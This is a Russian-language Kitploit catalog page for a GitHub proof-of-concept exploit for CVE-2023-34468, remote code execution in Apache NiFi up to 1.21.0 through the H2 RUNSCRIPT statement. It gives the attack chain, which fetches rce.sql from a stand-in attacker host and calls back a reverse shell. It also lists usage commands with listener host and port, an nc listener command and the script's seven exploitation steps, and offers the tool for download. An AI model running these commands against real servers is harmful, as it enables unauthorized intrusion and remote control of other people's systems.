Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-34468-POC — Эксплойт PoC для CVE-2023-34468 — RCE через H2 RUNSCRIPT в Apache NiFi <= 1.21.0 | Kitploit
Инструменты/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

Эксплойт PoC для CVE-2023-34468 — RCE через H2 RUNSCRIPT в Apache NiFi <= 1.21.0

Репозиторий
424 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Удаленное выполнение кода через H2 Database RUNSCRIPT в Apache NiFi <= 1.21.0


Уязвимость

Apache NiFi поставляется с H2 database JAR, встроенным по умолчанию. Сервис контроллера DBCPConnectionPool можно настроить на использование этого H2 драйвера. H2 поддерживает оператор RUNSCRIPT, который загружает и выполняет SQL-файл из удаленного URL. Этот SQL-файл может определять произвольный Java-код через CREATE ALIAS и выполнять его на серверной ОС.

Цепочка атаки:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Затронутые версии

Программное обеспечениеВерсия
Apache NiFi<= 1.21.0
Fixed in1.21.1+
JavaЛюбая (встроенная)

Требования

  • Python 3.x
  • библиотека requests → pip install requests
  • Цель NiFi с анонимным доступом на запись ИЛИ действительными учетными данными
  • Сетевой доступ от цели к вашей машине (для обратного вызова reverse shell)

Использование

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Аргументы

АргументПо умолчаниюОписание
--targethttp://NiFi.target.comБазовый URL цели NiFi
--lhost10.10.10.10Ваш IP (tun0)
--lport4444Порт прослушивателя reverse shell
--http-port80Порт для раздачи rce.sql
--cleanupFalseУдалить созданные артефакты после запуска

Настройка

Терминал 1 — прослушиватель:

root@kitploit:~
nc -lvnp 4444

Терминал 2 — эксплойт:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

Что делает PoC

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Скачать инструмент